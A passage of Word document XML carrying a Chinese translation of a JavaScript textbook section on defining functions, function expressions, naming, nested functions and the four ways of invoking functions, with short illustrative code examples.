    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dx=x2-x1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dy=y2-y1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Math.sqrt(dx*dx+dy*dy);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>计算阶乘的递归函数（调用自身的函数）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//x!</w:t>
      </w:r>
      <w:r>
        <w:t>的值是从</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>递减（步长为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）的值的累乘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function factorial(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=1)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x*factorial(x-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数表达式定义了一个函数用来求传入参数的平方</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意我们把它赋值给一个变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var square=function(x){return </w:t>
      </w:r>
      <w:r>
        <w:t>x*x;}//</w:t>
      </w:r>
      <w:r>
        <w:t>函数表达式可以包含名称，这在递归时很有用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=function fact(x){if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=1)return 1;else return x*fact(x-1);};//</w:t>
      </w:r>
      <w:r>
        <w:t>函数表达式也可以作为参数传给其他函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data.sort(function(a,b){return a-b;});//</w:t>
      </w:r>
      <w:r>
        <w:t>函数表达式有时定义后立即调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var tensquared=(function(x){return x*x;}(10));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>注意：以表达式方式定义的函数，函数的名称是可选的。一条函数声明语句实际上声明</w:t>
      </w:r>
      <w:r>
        <w:t>了一个变量，并把一个函数对象赋值给它。相对而言，定义函数表达式时并没有声明一个变量。函数可以命名，就像上面的阶乘函数，它需要一个名称来指代自己。如果一个函数定义表达式包含名称，函数的局部作用域将会包含一个绑定到函数对象的名称。实际上，函数的名称将成为函数内部的一个局部变量。通常而言，以表达式方式定义函数时都不需要名称，这会让定义它们的代码更为紧凑。函数定义表达式特别适合用来定义那些只会用到一次的函数，比如上面展示的最后两个例子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>函数命名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任何合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>标识符都可以用做一个函数的名称。命名时要尽量选择描述性强而又简洁的函数名。在这两者之间做到恰到好处是一门艺术，需要丰富的经验。精心挑选的函数名可以极大地改善代码的可读性（从而也提高了可维护性）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数名称通常是动词或以动词为前缀的词组。通常函数名的第一个字符为小写，这是一种编程约定。当函数名包含多个单词时，一种约定是将单词以下划线分隔，就像</w:t>
      </w:r>
      <w:r>
        <w:t>like_this()</w:t>
      </w:r>
      <w:r>
        <w:t>。还有另外一种约定，就是除了第一个单词之外的单词首字母使用大写字母，就像</w:t>
      </w:r>
      <w:r>
        <w:t>lik</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>eThis()</w:t>
      </w:r>
      <w:r>
        <w:t>。有一些函数是用做内部函数</w:t>
      </w:r>
      <w:r>
        <w:t>或私有函数（不是作为公用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分），这种函数名通常以一条下划线为前缀。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在一些编程风格中，或者编程框架里，通常为那些经常调用的函数指定短名称，比如客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>框架</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>（第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章会详细讲述）就将最常用的方法重命名为</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>（一个美元符号）（</w:t>
      </w:r>
      <w:r>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:t>节提到，美元符号和下划线是除了字母和数字之外的两个合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>标识符）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:t>5.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节所述，函数声明语句</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>被提前</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到外部脚本或外部函数作用域的顶部，所以以这种方式声明的函数，可以被在它定义之前出现的代码所调用。不过，以表达式定</w:t>
      </w:r>
      <w:r>
        <w:t>义的函数就另当别论了，为了调用一个函数，必须要能引用它，而要使用一个以表达式方式定义的函数之前，必须把它赋值给一个变量。变量的声明提前了（参见</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.1</w:t>
      </w:r>
      <w:r>
        <w:t>节），但给变量赋值是不会提前的，所以，以表达式方式定义的函数在定义之前无法调用）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请注意，例</w:t>
      </w:r>
      <w:r>
        <w:t>8-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的大多数函数（但不是全部）包含一条</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句导致函数停止执行，并返回它的表达式（如果有的话）的值给调用者。如果</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句没有一个与之相关的表达式，则它返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值。如果一个函数不包含</w:t>
      </w:r>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>urn</w:t>
      </w:r>
      <w:r>
        <w:t>语</w:t>
      </w:r>
      <w:r>
        <w:t>句，那它就只执行函数体中的每条语句，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值给调用者。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的大多数函数都是用来计算出一个值的，它们使用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>把值返回给调用者。而</w:t>
      </w:r>
      <w:r>
        <w:t>printprops()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的不用之处在于，它的任务是输出对象各属性的名称和值。没有必要返回值，该函数不包含</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句。</w:t>
      </w:r>
      <w:r>
        <w:t>printprops()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的返回值始终是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。（没有返回值的函数有时候称为过程）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="Qian_Tao_Han_Shu_"/>
      <w:r>
        <w:t>嵌套函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>里，函数可以嵌套在其他函数里。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function hypotenuse(a,b){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fu</w:t>
      </w:r>
      <w:r>
        <w:t>nction square(x){return x*x;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Math.sqrt(square(a)+square(b));</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嵌套函数的有趣之处在于它的变量作用域规则：它们可以访问嵌套它们（或多重嵌套）的函数的参数和变量。例如，在上面的代码里，内部函数</w:t>
      </w:r>
      <w:r>
        <w:t>square()</w:t>
      </w:r>
      <w:r>
        <w:t>可以读写外部函数</w:t>
      </w:r>
      <w:r>
        <w:t>hypotenuse()</w:t>
      </w:r>
      <w:r>
        <w:t>定义的参数</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>。这些作用域规则对内嵌函数非常重要，我们会在</w:t>
      </w:r>
      <w:r>
        <w:t>8.6</w:t>
      </w:r>
      <w:r>
        <w:t>节再深入了解它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节曾提到，函数声明语句并非真正的语句，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>规范只是允许它们作为顶级语句。它</w:t>
      </w:r>
      <w:r>
        <w:t>们可以出现在全局代码里，或者内嵌在其他函数中，但它们不能出现在循环、条件判断，或者</w:t>
      </w:r>
      <w:r>
        <w:t>try/cache/finally</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，此限制仅适用于以语句声明形式定义的函数。函数定义表达式可以出现在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码的任何地方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="8_2_Han_Shu_Diao_Yong_"/>
      <w:r>
        <w:t>8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函数调用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构成函数主体的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码在定义之时并不会执行，只有调用该函数时，它们才会执行。有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种方式来调用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>作为函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>作为方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>作为构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>通过它们的</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>方法间接调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="8_2_1_Han_Shu_Diao_Yong_"/>
      <w:r>
        <w:t>8.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函</w:t>
      </w:r>
      <w:r>
        <w:t>数调用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用调用表达式可以进行普通的函数调用也可进行方法调用（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）。一个调用表达式由多个函数表达式组成，每个函数</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>表达式都是由一个函数对象和左圆括号、参数列表和右圆括号组成，参数列表是由逗号分隔的零个或多个参数表达式组成。如果函数表达式是一个属性访问表达式，即该函数是一个对象的属性或数组中的一个元素，那么它就是一个方法调用表达式。下面将会解释这种情形。下面的代码展示了一些普通的函数调用表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>printprops({x:1});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var total=distance(0,0,2,1)+distan</w:t>
      </w:r>
      <w:r>
        <w:t>ce(2,1,3,5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var probability=factorial(5)/factorial(13);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在一个调用中，每个参数表达式（圆括号之间的部分）都会计算出一个值，计算的结果作为参数传递给另外一个函数。这些值作为实参传递给声明函数时定义的形参。在函数体中存在一个形参的引用，指向当前传入的实参列表，通过它可以获得参数的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于普通的函数调用，函数的返回值成为调用表达式的值。如果该函数返回是因为解释器到达结尾，返回值就是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。如果函数返回是因为解释器执行到一条</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句，返回值就是</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>之后的表达式的值，如果</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句没有值，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>和非严格的</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>对函数调用的规定，调用上下文（</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值）是全局对象。然而，在严格模式下，调用上下文则是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以函数形式调用的函数通常不使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字。不过，</w:t>
      </w:r>
      <w:r>
        <w:t>"this"</w:t>
      </w:r>
      <w:r>
        <w:t>可以用来</w:t>
      </w:r>
      <w:r>
        <w:t>判断当前是否是严格模式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义并调用一个函数来确定当前脚本运行时是否为严格模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var strict=(function(){return!this;}());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="8_2_2_Fang_Fa_Diao_Yong_"/>
      <w:r>
        <w:t>8.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　方法调用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个方法无非是个保存在一个对象的属性里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数。如果有一个函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>和一个对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>，则可以用下面的代码给</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>m()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.m=f;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>定义了方法</w:t>
      </w:r>
      <w:r>
        <w:t>m()</w:t>
      </w:r>
      <w:r>
        <w:t>，调用它时就像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.m();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>或者，如果</w:t>
      </w:r>
      <w:r>
        <w:t>m()</w:t>
      </w:r>
      <w:r>
        <w:t>需要两个实参，调用起来则像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.m(x,y);</w:t>
      </w:r>
    </w:p>
